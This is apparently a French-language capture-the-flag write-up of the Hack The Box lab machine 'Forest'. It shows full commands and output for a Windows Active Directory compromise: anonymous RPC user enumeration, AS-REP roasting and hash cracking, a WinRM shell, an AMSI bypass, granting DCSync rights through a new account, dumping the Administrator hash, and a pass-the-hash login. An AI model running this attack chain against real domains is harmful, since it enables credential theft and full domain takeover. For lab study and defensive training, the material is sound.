Forest

ldap rpc bloodhound acl dcsync

Nom machine : Forest
Difficulté : Facile
OS : Windows AD

Enumération

NMAP

Nmap scan report for 10.10.10.161
Host is up (0.031s latency).
Not shown: 65512 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 09:49:44Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49706/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Nous allons énumérer ces différents services.

RPC (135)

┌──(kali㉿kali)-[~]
└─$ rpcclient htb.local -U "" -N
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Nous pouvions également utiliser enum4linux.

Accès initial

Grâce à la liste d'utilisateur, nous allons tenter de récupérer des jetons TGT

┌──(kali㉿kali)-[~/htb/forest]
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile user.txt -outputfile hashes.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:4fd7e4a875cd711afd39c7add5b61fd7$de67e15cf19ac59a2911c6f896437158bb2032476c54dc31e5edcb28d4c4da34f30fa28b91f40541df2c327eb760230b6018ebd2c84c8a7dea6ddf3ab2054065b1e9023caa6e9d36acb886da386fb5082ba14ac262e0ef4144b441867ccd401dc821ba0adb18bec21decf30599bb2ee9ec33bbf595c5cbcbf03d61d2fa232947f5e5ab782b353a3c5dfb749c68bee3b107a94b485e9c5ce8bcae256bbaa15412e83defc7623217ec5e3172cee43e11664ab1667ce79dfeb09e171c40a764fb09ecc3987b87126088355c6a2b3aa013fe99898f5e1d9b28382ff71df6d67f11e92ccaae99f31f
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

Nous allons le cracker

┌──(kali㉿kali)-[~/htb/forest]
└─$ hashcat -h | grep Kerb
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol

┌──(kali㉿kali)-[~/htb/forest]
└─$ hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
{...}
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$svc-alfresco@HTB.LOCAL:087cd0edfa6acc073f88d9f83d6b754f$251622b3f15196c4a14a32cd767951601a209411c8b2af1a9fb4087ad057c78fee46877716305fe6e91ada36ffa3df8ce1141bb32655aad2226601cd798e5593becbae2756c6820f6f7abd4817d6688fbff9fa135423bc740ebb83f0980dfa75fed4fb6dc424aa869bd26b29792f674a51a1837ba976a30e6bd60b6180dcfea7daa3b149dbf04c982076d4453b66de69c9a321ce9a2d161a39b5df96738723927747e46ca844ced05c181caff77d90e0e27f600e9dea820eddd41f412c4267b8160e02aacd71588b044ac437979d548aba3bf16cff89d32553c74387f2a5dff3fb72026b858e:s3rvice
{...}

svc-alfresco:s3rvice

┌──(kali㉿kali)-[~]
└─$ nxc winrm 10.10.10.161 -u svc-alfresco -p 's3rvice'
WINRM       10.10.10.161    5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

┌──(kali㉿kali)-[~]
└─$ evil-winrm -u svc-alfresco -p 's3rvice' -i 10.10.10.161
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco

nxc nous a montré que nous pouvons utiliser le service winrm pour nous connecter à la cible, ce que nous avons fait à l'aide de l'outil evil-winrm.

Elévation des privilèges

Nous allons énumérer grâce à BloodHound.

Double clique sur notre user, puis dans le menu à gauche, rechercher les groupes. svc-alfresco appartient à Account Operator, ce qui signifie que je peux modifier/créer des comptes.

En continuant l'énumération, on voit que l'un des groupes à l'autorisation WriteDacl. L'onglet "windows" explique comment l'exploiter pour avoir DCSync privilège.

Nous allons maintenant passer à l'exploitation.

Tout d'abord, créons un user appartenant au groupe "Exchange Windows Permissions" puis également au groupe local "Remote Management Users" afin de pouvoir s'y connecter.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user athenax aze123! /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" athenax /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" athenax /add
The command completed successfully.

Nous allons d'abord bypass-4MSI



   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers

[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
Info: Patching 4MSI, please be patient...
                                        
[+] Success!

Ensuite, exécutons les commandes trouvées à l'aide de BloodHound.

*Evil-WinRM* PS C:\Users\athenax\Documents> $SecPassword = ConvertTo-SecureString 'aze123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\athenax\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\athenax', $SecPassword)
*Evil-WinRM* PS C:\Users\athenax\Documents> Add-DomainObjectAcl -Credential $cred -Rights DCSync -PrincipalIdentity athenax

Attention à bien les adapter à nos informations.

Nous utilisons miantenant impacket-secretsdump. Mimikatz pouvait être également utilisé.

──(kali㉿kali)-[~]
└─$ impacket-secretsdump htb/athenax:'aze123!'@10.10.10.161
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Plus qu'à se connecter ...

──(kali㉿kali)-[~]
└─$ evil-winrm -u administrator -H '32693b11e6aa90eb43d32c72a07ceea6' -i 10.10.10.161
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator

PrécédentFlight SuivantMonteverde

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagRPC (135)

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

RPC (135)

Accès initial

Elévation des privilèges